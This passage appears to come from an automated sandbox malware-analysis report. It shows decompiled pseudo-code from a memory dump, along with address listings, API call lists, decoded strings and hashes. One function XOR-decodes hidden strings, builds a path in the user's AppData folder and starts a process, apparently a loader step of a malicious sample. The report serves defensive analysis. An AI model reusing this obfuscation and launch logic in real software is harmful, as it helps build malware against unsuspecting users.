															__eflags = _t192;
															if(_t192 == 0) {
																_t193 = E00B55BBD();
																_push(_a16);
																_push(_a12);
																 *_t193 = _v12;
																_push(_t267);
																_push(_a4);
																L39();
																_t215 = _t193;
																goto L36;
															} else {
																_t207 = _t207 + 5;
																__eflags = _t207 - 0xb35874;
																if(_t207 != 0xb35874) {
																	continue;
																} else {
																	E00B564B8(_t267);
																	goto L34;
																}
															}
															goto L103;
														}
													}
													goto L38;
												} else {
													_t215 = _t206 | 0xffffffff;
													L36:
													E00B564B8(_t267);
													goto L37;
												}
											} else {
												_t197 = E00B56EA8(_t206, _t280, _t206, 0);
												__eflags = _t197;
												if(_t197 != 0) {
													L34:
													_t215 = _t207 | 0xffffffff;
												} else {
													_push(_a16);
													_push(_a12);
													_push(_t206);
													_push(_a4);
													L39();
													_t215 = _t197;
												}
												L37:
												E00B564B8(_t280);
												_t110 = _t215;
												goto L13;
											}
										} else {
											_t266 = E00B65190(_t280, 0x3a);
											__eflags = _t266;
											if(_t266 != 0) {
												goto L21;
											} else {
												_t252 = _t280;
												_t264 = _t252 + 1;
												do {
													_t199 =  *_t252;
													_t252 = _t252 + 1;
													__eflags = _t199;
												} while (_t199 != 0);
												_t267 = _t252 - _t264 + 3;
												_t207 = E00B598AF(_t267, 1);
												_pop(_t223);
												__eflags = _t207;
												if(_t207 != 0) {
													_t201 = E00B56383(_t207, _t267, 0xb3585c);
													_t294 = _t293 + 0xc;
													__eflags = _t201;
													if(_t201 != 0) {
														L38:
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														E00B52919();
														asm("int3");
														_t290 = _t294;
														__eflags = _v36;
														if(_v36 == 0) {
															L40:
															 *((intOrPtr*)(E00B55BBD())) = 0x16;
															return E00B528EC() | 0xffffffff;
														}
														__eflags = _a8;
														if(_a8 == 0) {
															goto L40;
														}
														__eflags = _v0 - 4;
														if(_v0 > 4) {
															 *(E00B55BAA()) =  *_t186 & 0x00000000;
															goto L40;
														}
														_push(_t207);
														_push(_t267);
														_v20 = 0;
														_v12 = 0;
														_t127 = E00B61217(_a8, _a12,  &_v20,  &_v12);
														_t208 = _t207 | 0xffffffff;
														__eflags = _t127 - _t208;
														if(_t127 == _t208) {
															E00B564B8(_v12);
															_v12 = 0;
															E00B564B8(_v20);
															L48:
															_t147 = _t208;
															L75:
															return _t147;
														}
														__eflags = _v0 - 4;
														_v16 = 0;
														_t132 = E00B56A8A( &_v16,  &_v24, (_t127 & 0xffffff00 | _v0 != 0x00000004) & 0x000000ff);
														__eflags = _t132;
														if(_t132 == 0) {
															E00B564B8(_v16);
															_v16 = 0;
															E00B564B8(_v12);
															_v12 = 0;
															E00B564B8(_v20);
															goto L48;
														}
														__eflags = _v0 - 4;
														_push(_t280);
														if(_v0 == 4) {
															_push(8);
															_pop(0);
														}
														_t133 = E00B55BAA();
														 *_t133 = 0;
														_t269 = 0x44;
														E00B4D0F0(_t269,  &_v116, 0, _t269);
														_v66 = _v24;
														_v64 = _v16;
														_v116 = _t269;
														_t141 = E00B61292(_t223, __eflags, _a4, _v20, 0, 0, 1, 0, _v12, 0,  &_v116,  &_v48);
														_t285 = _v48;
														_t270 = _v44;
														__eflags = _t141;
														if(_t141 == 0) {
															L60:
															E00B55B87(GetLastError());
															__eflags = _t270 - _t208;
															if(_t270 != _t208) {
																CloseHandle(_t270);
															}
															__eflags = _t285 - _t208;
															if(_t285 != _t208) {
																CloseHandle(_t285);
															}
															L70:
															E00B564B8(_v16);
															_v16 = _v16 & 0x00000000;
															E00B564B8(_v12);
															_v12 = _v12 & 0x00000000;
															E00B564B8(_v20);
															_t147 = _t208;
															L74:
															goto L75;
														}
														_t150 = _v0;
														__eflags = _t150 - 2;
														if(_t150 != 2) {
															__eflags = _t150;
															if(_t150 != 0) {
																__eflags = _t150 - 4;
																if(_t150 != 4) {
																	__eflags = _t270 - _t208;
																	if(_t270 != _t208) {
																		CloseHandle(_t270);
																	}
																	E00B564B8(_v16);
																	_v16 = _v16 & 0x00000000;
																	E00B564B8(_v12);
																	_t76 =  &_v12;
																	 *_t76 = _v12 & 0x00000000;
																	__eflags =  *_t76;
																	E00B564B8(_v20);
																	_t147 = _t285;
																	goto L74;
																}
																__eflags = _t270 - _t208;
																if(_t270 != _t208) {
																	CloseHandle(_t270);
																}
																__eflags = _t285 - _t208;
																if(_t285 != _t208) {
																	CloseHandle(_t285);
																}
																_t208 = 0;
																__eflags = 0;
																goto L70;
															}
															WaitForSingleObject(_t285, _t208);
															_t177 = GetExitCodeProcess(_v48,  &_v28);
															__eflags = _t177;
															if(_t177 == 0) {
																goto L60;
															}
															_v32 = _v28;
															__eflags = _t270 - _t208;
															if(_t270 != _t208) {
																CloseHandle(_t270);
															}
															__eflags = _t285 - _t208;
															if(_t285 != _t208) {
																CloseHandle(_t285);
															}
															_t208 = _v32;
															goto L70;
														}
														E00B52EE0(0);
														asm("int3");
														_push(_t290);
														_push(_t208);
														_t210 = _t223;
														_push(_t285);
														_push(_t270);
														_v196 = _t210;
														 *( *( *_t210)) =  *( *( *_t210)) & 0x00000000;
														 *( *( *(_t210 + 4))) =  *( *( *(_t210 + 4))) & 0x00000000;
														_t287 =  *0xb6a8c8; // 0x40
														__eflags = _t287;
														if(_t287 != 0) {
															_t80 = _t287 - 1; // 0x3f
															_t277 = _t80;
															while(1) {
																_t240 = (_t277 & 0x0000003f) * 0x38;
																_t168 =  *((intOrPtr*)(0xb6a6c8 + (_t277 >> 6) * 4));
																__eflags =  *((char*)(_t168 + _t240 + 0x28));
																if( *((char*)(_t168 + _t240 + 0x28)) == 0) {
																	goto L82;
																}
																_t277 = _t277 - 1;
																_t287 = _t287 - 1;
																__eflags = _t287;
																if(_t287 != 0) {
																	continue;
																}
																goto L82;
															}
														}
														L82:
														__eflags = _t287 - 0x3332;
														if(_t287 < 0x3332) {
															_v36 = 0x00000004 + _t287 * 0x00000005 & 0x0000ffff;
															_t159 = E00B598AF(0x00000004 + _t287 * 0x00000005 & 0x0000ffff, 1);
															_v28 = _t159;
															__eflags = _t159;
															if(_t159 != 0) {
																_t87 = _t159 + 4; // 0x4
																_t258 = _t87;
																 *_t159 = _t287;
																_t227 = _t258 + _t287;
																_v16 = _t258;
																_t272 = 0;
																_v20 = _t227;
																_v24 = _t227;
																__eflags = _t287;
																if(_t287 != 0) {
																	_t163 = _t258;
																	_t214 = _t227;
																	do {
																		_t238 = (_t272 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb6a6c8 + (_t272 >> 6) * 4));
																		_t261 =  *((intOrPtr*)(_t238 + 0x28));
																		__eflags = _t261 & 0x00000010;
																		if((_t261 & 0x00000010) != 0) {
																			 *(_t163 + _t272) = 0;
																			_t239 = _t238 | 0xffffffff;
																			__eflags = _t239;
																		} else {
																			 *(_t163 + _t272) = _t261;
																			_t239 =  *(_t238 + 0x18);
																		}
																		 *_t214 = _t239;
																		_t272 = _t272 + 1;
																		_t214 =  &(_t214[1]);
																		__eflags = _t272 - _t287;
																	} while (_t272 != _t287);
																	_t159 = _v28;
																	_t210 = _v32;
																	_t258 = _v16;
																}
																__eflags =  *((char*)( *((intOrPtr*)(_t210 + 8))));
																if( *((char*)( *((intOrPtr*)(_t210 + 8)))) == 0) {
																	_t234 = 0;
																	__eflags = 0;
																	while(1) {
																		__eflags = _t287 - 3;
																		if(_t287 >= 3) {
																			_t274 = 3;
																		} else {
																			_t274 = _t287;
																		}
																		__eflags = _t234 - _t274;
																		if(_t234 != _t274) {
																			_t275 = _v20;
																			 *_t258 = 0;
																			 *_t275 =  *_t275 | 0xffffffff;
																			_t234 = _t234 + 1;
																			_t258 = _t258 + 1;
																			_v20 =  &(_t275[1]);
																			continue;
																		}
																		goto L100;
																	}
																}
																L100:
																 *( *( *_t210)) = _t159;
																_t212 = 1;
																__eflags = 1;
																 *( *( *(_t210 + 4))) = _v36;
															} else {
																_t164 = E00B55BBD();
																_t212 = 0;
																 *_t164 = 0xc;
															}
															E00B564B8(0);
															_t162 = _t212;
														} else {
															 *((intOrPtr*)(E00B55BBD())) = 0xc;
															_t162 = 0;
														}
														return _t162;
													} else {
														_t202 = E00B60E2C(_t207, _t267, _t280);
														_t294 = _t294 + 0xc;
														__eflags = _t202;
														if(_t202 != 0) {
															goto L38;
														} else {
															_t5 = _t207 + 2; // 0x2
															_t266 = _t5;
															E00B564B8(_t202);
															goto L21;
														}
													}
												} else {
													_t110 = E00B564B8(_t200) | 0xffffffff;
													__eflags = _t110;
													L13:
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					_t110 = E00B528EC() | 0xffffffff;
					L14:
					return _t110;
				}
				goto L103;
			}

0x00b56549
0x00b5654b
0x00b56550
0x00b56567
0x00b5656a
0x00000000
0x00b5656c
0x00b5656c
0x00b5656f
0x00b56571
0x00000000
0x00b56573
0x00b56573
0x00b56575
0x00b56577
0x00000000
0x00b56579
0x00b56579
0x00b5657c
0x00000000
0x00b5657e
0x00b5658b
0x00b5658d
0x00b56592
0x00b56595
0x00b56597
0x00b56599
0x00b5661f
0x00b56621
0x00b56627
0x00b56627
0x00b56623
0x00b56623
0x00b56625
0x00000000
0x00000000
0x00b56625
0x00000000
0x00b5659f
0x00b5659f
0x00b565a1
0x00b56629
0x00b5662f
0x00b56632
0x00b56634
0x00b5663b
0x00b5663d
0x00b5666a
0x00b5666c
0x00b5666f
0x00b5666f
0x00b56671
0x00b56672
0x00b56672
0x00b5667e
0x00b56686
0x00b56689
0x00b5668a
0x00b5668c
0x00b56697
0x00b5669c
0x00b566a1
0x00b566a4
0x00b566a6
0x00b566af
0x00b566af
0x00b566b1
0x00b566b4
0x00b566b9
0x00b566c0
0x00b566c3
0x00b566c9
0x00b566ce
0x00b566d1
0x00b566d3
0x00000000
0x00000000
0x00b566d7
0x00b566dd
0x00b566de
0x00b566e0
0x00b566f9
0x00b566fe
0x00b56704
0x00b56707
0x00b56709
0x00b5670a
0x00b5670d
0x00b56715
0x00000000
0x00b566e2
0x00b566e2
0x00b566e5
0x00b566eb
0x00000000
0x00b566ed
0x00b566ee
0x00000000
0x00b566f3
0x00b566eb
0x00000000
0x00b566e0
0x00b566c3
0x00000000
0x00b5668e
0x00b5668e
0x00b56717
0x00b56718
0x00000000
0x00b5671d
0x00b5663f
0x00b56642
0x00b56649
0x00b5664b
0x00b566f4
0x00b566f4
0x00b56651
0x00b56651
0x00b56654
0x00b56657
0x00b56658
0x00b5665b
0x00b56663
0x00b56663
0x00b5671e
0x00b5671f
0x00b56725
0x00000000
0x00b56725
0x00b565a7
0x00b565af
0x00b565b3
0x00b565b5
0x00000000
0x00b565b7
0x00b565b7
0x00b565b9
0x00b565bc
0x00b565bc
0x00b565be
0x00b565bf
0x00b565bf
0x00b565c7
0x00b565d0
0x00b565d3
0x00b565d4
0x00b565d6
0x00b565f0
0x00b565f5
0x00b565f8
0x00b565fa
0x00b5672c
0x00b5672e
0x00b5672f
0x00b56730
0x00b56731
0x00b56732
0x00b56733
0x00b56738
0x00b5673c
0x00b56741
0x00b56745
0x00b56747
0x00b5674c
0x00000000
0x00b56757
0x00b5675f
0x00b56763
0x00000000
0x00000000
0x00b56765
0x00b56769
0x00b56770
0x00000000
0x00b56770
0x00b56775
0x00b56776
0x00b56780
0x00b56787
0x00b5678d
0x00b56792
0x00b56798
0x00b5679a
0x00b5679f
0x00b567a7
0x00b567aa
0x00b567f6
0x00b567f6
0x00b5693c
0x00000000
0x00b5693d
0x00b567b3
0x00b567b7
0x00b567c9
0x00b567d1
0x00b567d3
0x00b567d8
0x00b567e0
0x00b567e3
0x00b567eb
0x00b567ee
0x00000000
0x00b567f3
0x00b567fd
0x00b56801
0x00b56804
0x00b56806
0x00b56808
0x00b56808
0x00b56809
0x00b56810
0x00b56815
0x00b5681a
0x00b56823
0x00b5682a
0x00b56834
0x00b56849
0x00b5684e
0x00b56854
0x00b56857
0x00b56859
0x00b568a5
0x00b568ac
0x00b568b2
0x00b568b4
0x00b568b7
0x00b568b7
0x00b568bd
0x00b568bf
0x00b568c2
0x00b568c2
0x00b568e7
0x00b568ea
0x00b568f2
0x00b568f6
0x00b568fe
0x00b56902
0x00b56907
0x00b56938
0x00000000
0x00b5693b
0x00b5685b
0x00b5685e
0x00b56861
0x00b56867
0x00b56869
0x00b568ca
0x00b568cd
0x00b5690b
0x00b5690d
0x00b56910
0x00b56910
0x00b56919
0x00b56921
0x00b56925
0x00b5692d
0x00b5692d
0x00b5692d
0x00b56931
0x00b56936
0x00000000
0x00b56936
0x00b568cf
0x00b568d1
0x00b568d4
0x00b568d4
0x00b568da
0x00b568dc
0x00b568df
0x00b568df
0x00b568e5
0x00b568e5
0x00000000
0x00b568e5
0x00b5686d
0x00b5687a
0x00b56880
0x00b56882
0x00000000
0x00000000
0x00b56887
0x00b5688a
0x00b5688c
0x00b5688f
0x00b5688f
0x00b56895
0x00b56897
0x00b5689a
0x00b5689a
0x00b568a0
0x00000000
0x00b568a0
0x00b56944
0x00b56949
0x00b5694c
0x00b56952
0x00b56953
0x00b56955
0x00b56956
0x00b56957
0x00b5695e
0x00b56966
0x00b56969
0x00b5696f
0x00b56971
0x00b56973
0x00b56973
0x00b56976
0x00b56980
0x00b56983
0x00b5698a
0x00b5698f
0x00000000
0x00000000
0x00b56991
0x00b56992
0x00b56992
0x00b56995
0x00000000
0x00000000
0x00000000
0x00b56995
0x00b56976
0x00b56997
0x00b56997
0x00b5699d
0x00b569bd
0x00b569c0
0x00b569c5
0x00b569ca
0x00b569cc
0x00b569e0
0x00b569e0
0x00b569e3
0x00b569e5
0x00b569e8
0x00b569eb
0x00b569ed
0x00b569f0
0x00b569f3
0x00b569f5
0x00b569f7
0x00b569f9
0x00b569fb
0x00b56a08
0x00b56a0f
0x00b56a12
0x00b56a15
0x00b56a1f
0x00b56a23
0x00b56a23
0x00b56a17
0x00b56a17
0x00b56a1a
0x00b56a1a
0x00b56a26
0x00b56a28
0x00b56a29
0x00b56a2c
0x00b56a2c
0x00b56a30
0x00b56a33
0x00b56a36
0x00b56a36
0x00b56a3c
0x00b56a3f
0x00b56a41
0x00b56a41
0x00b56a43
0x00b56a43
0x00b56a46
0x00b56a4e
0x00b56a48
0x00b56a48
0x00b56a48
0x00b56a4f
0x00b56a51
0x00b56a53
0x00b56a56
0x00b56a59
0x00b56a5c
0x00b56a5d
0x00b56a61
0x00000000
0x00b56a61
0x00000000
0x00b56a51
0x00b56a43
0x00b56a66
0x00b56a6a
0x00b56a74
0x00b56a74
0x00b56a77
0x00b569ce
0x00b569ce
0x00b569d3
0x00b569d5
0x00b569d5
0x00b56a7b
0x00b56a81
0x00b5699f
0x00b569a4
0x00b569aa
0x00b569aa
0x00b56a89
0x00b56600
0x00b56603
0x00b56608
0x00b5660b
0x00b5660d
0x00000000
0x00b56613
0x00b56614
0x00b56614
0x00b56617
0x00000000
0x00b5661c
0x00b5660d
0x00b565d8
0x00b565df
0x00b565df
0x00b565e2
0x00000000
0x00b565e3
0x00b565d6
0x00b565b5
0x00b565a1
0x00b56599
0x00b5657c
0x00b56577
0x00b56571
0x00b56552
0x00b56552
0x00b56557
0x00b56562
0x00b565e4
0x00b565e8
0x00b565e8
0x00000000

APIs

_strrchr.LIBCMT ref: 00B56583
_strrchr.LIBCMT ref: 00B5658D
_strrchr.LIBCMT ref: 00B565AA
_free.LIBCMT ref: 00B565D9
_strrchr.LIBCMT ref: 00B56634
_free.LIBCMT ref: 00B56617

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B56718
_free.LIBCMT ref: 00B5671F

Strings

.com, xrefs: 00B566B9, 00B566C3
ccs, xrefs: 00B566E5

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free_strrchr$ErrorFreeHeapLast
String ID: .com$ccs
API String ID: 1244457489-1235067636
Opcode ID: b8436f82ce3670961e41eee2c4203efaa12637aaed4a5cfdac359e432a264654
Instruction ID: 0aa4379a4d9f7d75c0b23c0664e32b6a093ebc86599d93bb2a48a1a78c0cd042
Opcode Fuzzy Hash: b8436f82ce3670961e41eee2c4203efaa12637aaed4a5cfdac359e432a264654
Instruction Fuzzy Hash: 9D512C726006056AEF256A749C86BBB37DCDF55366FE401EDFD1097282FB76CD088260

Uniqueness

Uniqueness Score: -1.00%

Function 00B44CEE, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 188
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00B44CEE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				CHAR* _t54;
				intOrPtr _t60;
				void* _t64;
				void _t65;
				void _t66;
				CHAR* _t72;
				char _t75;
				CHAR* _t91;
				signed char _t93;
				void* _t99;
				signed int _t104;
				void* _t110;
				intOrPtr* _t111;
				void* _t114;
				signed int _t115;
				void* _t117;
				void* _t120;
				intOrPtr _t126;
				intOrPtr* _t130;
				void* _t131;
				CHAR* _t132;
				CHAR* _t133;
				void* _t135;
				CHAR* _t136;
				signed int _t138;
				void* _t140;
				void* _t142;

				_t142 = __eflags;
				_t50 =  *0xb69014; // 0x26ce9e99
				 *(_t138 + 0xec) = _t50 ^ _t138;
				 *((intOrPtr*)(_t138 + 0x20)) = E00B509A2();
				E00B42B76(__ebx, 0x104, __esi, _t142, _t52);
				_t54 = E00B509A2();
				_t130 = __imp__SHGetFolderPathA;
				_t91 = _t54;
				 *(_t138 + 0x1c) = _t91;
				 *_t130(0, 0x1a, 0, 0, _t91, 0x208, 0x104, __edi, __esi, _t135, __ebx);
				asm("movaps xmm0, [0xb3db70]");
				_t99 = 0;
				asm("movups [esp+0x78], xmm0");
				 *((intOrPtr*)(_t138 + 0x88)) = 0x2137211f;
				 *((intOrPtr*)(_t138 + 0x8c)) = 0x23057535;
				 *((short*)(_t138 + 0x90)) = 0x3b39;
				 *((intOrPtr*)(_t138 + 0x92)) = 0x3e36;
				do {
					_t8 = _t99 + 0x40; // 0x40
					 *(_t138 + _t99 + 0x78) =  *(_t138 + _t99 + 0x78) ^ _t8;
					_t99 = _t99 + 1;
				} while (_t99 < 0x1d);
				 *((char*)(_t138 + 0x95)) = 0;
				lstrcatA(_t91, _t138 + 0x78);
				_t60 = E00B509A2();
				 *((intOrPtr*)(_t138 + 0x18)) = _t60;
				_t136 = E00B509A2();
				 *_t130(0, 0x1a, 0, 0, _t136, 0x104, 0x40);
				asm("movaps xmm0, [0xb3db70]");
				asm("movups [esp+0x78], xmm0");
				 *((char*)(_t138 + 0x88)) = 0;
				_t64 = E00B42846(_t138 + 0x78);
				_t114 = _t64;
				_t131 = _t64;
				do {
					_t65 =  *_t114;
					_t114 = _t114 + 1;
				} while (_t65 != 0);
				_t115 = _t114 - _t131;
				_t18 = _t136 - 1; // -1
				_t120 = _t18;
				do {
					_t66 =  *(_t120 + 1);
					_t120 = _t120 + 1;
				} while (_t66 != 0);
				_t104 = _t115 >> 2;
				memcpy(_t120, _t131, _t104 << 2);
				memcpy(_t131 + _t104 + _t104, _t131, _t115 & 0x00000003);
				_t140 = _t138 + 0x18;
				_t132 =  *(_t140 + 0x14);
				E00B4A313(lstrcatA, _t132, _t132);
				lstrcatA(_t136, _t132);
				E00B48B24( *((intOrPtr*)(_t140 + 0x1c)), _t136);
				_push(0x514);
				_t72 = E00B509A2();
				asm("movaps xmm0, [0xb3dcf0]");
				_t133 = _t72;
				asm("movups [esp+0x9c], xmm0");
				asm("movaps xmm0, [0xb3dd40]");
				_t110 = 0;
				asm("movups [esp+0xa8], xmm0");
				 *((intOrPtr*)(_t140 + 0xe8)) = 0xbef3e5f1;
				asm("movaps xmm0, [0xb3db30]");
				asm("movups [esp+0xb8], xmm0");
				 *((intOrPtr*)(_t140 + 0xec)) = 0xaae4fcf0;
				asm("movaps xmm0, [0xb3db50]");
				asm("movups [esp+0xc8], xmm0");
				 *((char*)(_t140 + 0xf0)) = 0;
				asm("movaps xmm0, [0xb3df60]");
				asm("movups [esp+0xd8], xmm0");
				do {
					_t26 = _t110 + 0x40; // 0x40
					 *(_t140 + _t110 + 0x98) =  *(_t140 + _t110 + 0x98) ^ _t26;
					_t110 = _t110 + 1;
				} while (_t110 < 0x58);
				_t111 = _t140 + 0x98;
				 *((char*)(_t140 + 0xf0)) = 0;
				_t117 = _t133 - _t111;
				do {
					_t75 =  *_t111;
					 *((char*)(_t117 + _t111)) = _t75;
					_t111 = _t111 + 1;
				} while (_t75 != 0);
				_t93 = 0x62;
				 *((char*)(_t140 + 0x15)) = 0;
				 *((char*)(_t140 + 0x15)) = 0;
				 *(_t140 + 0x14) = _t93 ^ 0x00000040;
				lstrcatA(_t133, _t140 + 0x14);
				lstrcatA(_t133, _t136);
				 *((char*)(_t140 + 0x15)) = 0;
				 *(_t140 + 0x14) = _t93 ^ 0x00000040;
				 *((char*)(_t140 + 0x1d)) = 0;
				lstrcatA(_t133, _t140 + 0x14);
				_t126 = 0x44;
				E00B4D0F0(_t126, _t140 + 0x34, 0, lstrcatA);
				 *((intOrPtr*)(_t140 + 0x3c)) = _t126;
				 *((intOrPtr*)(_t140 + 0x44)) = 0xb699c0;
				asm("stosd");
				_t141 = _t140 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA( *(_t140 + 0x4c), _t133, 0, 0, 0, 0, 0, 0, _t141 + 0x34, _t141 + 0x20);
				return E00B4AE43( *(_t141 + 0xfc) ^ _t141);
			}

0x00b44cee
0x00b44cf4
0x00b44cfb
0x00b44d13
0x00b44d17
0x00b44d21
0x00b44d26
0x00b44d2c
0x00b44d32
0x00b44d3b
0x00b44d3d
0x00b44d44
0x00b44d46
0x00b44d4b
0x00b44d56
0x00b44d61
0x00b44d6b
0x00b44d76
0x00b44d76
0x00b44d79
0x00b44d7d
0x00b44d7e
0x00b44d87
0x00b44d97
0x00b44d9b
0x00b44da2
0x00b44dac
0x00b44db6
0x00b44db8
0x00b44dc3
0x00b44dc8
0x00b44dd0
0x00b44dd5
0x00b44dd7
0x00b44dd9
0x00b44dd9
0x00b44ddb
0x00b44ddc
0x00b44de0
0x00b44de2
0x00b44de2
0x00b44de5
0x00b44de5
0x00b44de8
0x00b44de9
0x00b44def
0x00b44df2
0x00b44df9
0x00b44df9
0x00b44dfb
0x00b44e00
0x00b44e07
0x00b44e0e
0x00b44e13
0x00b44e18
0x00b44e1d
0x00b44e24
0x00b44e26
0x00b44e2f
0x00b44e36
0x00b44e38
0x00b44e40
0x00b44e4b
0x00b44e52
0x00b44e5a
0x00b44e65
0x00b44e6c
0x00b44e74
0x00b44e7c
0x00b44e83
0x00b44e8b
0x00b44e8b
0x00b44e8e
0x00b44e95
0x00b44e96
0x00b44e9b
0x00b44ea2
0x00b44eae
0x00b44eb0
0x00b44eb0
0x00b44eb2
0x00b44eb5
0x00b44eb6
0x00b44ec2
0x00b44ec5
0x00b44ecc
0x00b44ed1
0x00b44edb
0x00b44edf
0x00b44ee4
0x00b44eed
0x00b44ef5
0x00b44ef9
0x00b44efd
0x00b44f05
0x00b44f0a
0x00b44f14
0x00b44f1c
0x00b44f1d
0x00b44f20
0x00b44f21
0x00b44f22
0x00b44f38
0x00b44f56

APIs

Part of subcall function 00B42B76: GetCurrentProcess.KERNEL32(00000000), ref: 00B42BE0
Part of subcall function 00B42B76: IsWow64Process.KERNEL32(00000000), ref: 00B42BE7
Part of subcall function 00B42B76: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000101,?), ref: 00B42C08

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44D3B
lstrcatA.KERNEL32(00000000,?), ref: 00B44D97
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00B44DB6
lstrcatA.KERNEL32(00000000,?,?), ref: 00B44E07
lstrcatA.KERNEL32(00000000,?), ref: 00B44EDB
lstrcatA.KERNEL32(00000000,00000000), ref: 00B44EDF
lstrcatA.KERNEL32(00000000,?), ref: 00B44EF9
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00B44F38

Strings

9;, xrefs: 00B44D61
6>, xrefs: 00B44D6B
Tett, xrefs: 00B44F14

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$Process$FolderPath$CreateCurrentOpenWow64
String ID: 6>$9;$Tett
API String ID: 3226924228-1827138343
Opcode ID: 981124911325d0b350ce8f5938968699e733c9d5e8c09f42fedbee88abd490ce
Instruction ID: 06f21887c8289e29cf1415a648942e5d8abb61f1750d3ac3329c8c33516f11c4
Opcode Fuzzy Hash: 981124911325d0b350ce8f5938968699e733c9d5e8c09f42fedbee88abd490ce
Instruction Fuzzy Hash: EA61D4614083849EE321DF38DC41BAFBBE8EFDA304F10455DF9C897162EA7459899B63

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B36D, Relevance: 18.4, APIs: 12, Instructions: 375
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00B5B36D(char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				intOrPtr* _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t234 = E00B598AF(1, 0x50);
					_v8 = _t234;
					E00B564B8(0);
					if(_t234 != 0) {
						_t227 = E00B598AF(1, 4);
						_v12 = _t227;
						E00B564B8(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0xb690c0, _t212 << 2);
								L24:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L26;
							}
							_t232 = E00B598AF(1, 4);
							_v16 = _t232;
							E00B564B8(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E00B5EDC5(_t209, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E00B5EDC5(_t209, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E00B5EDC5(_t209, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E00B5EDC5(_t209, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E00B5EDC5(_t209, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E00B5EDC5(_t209, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
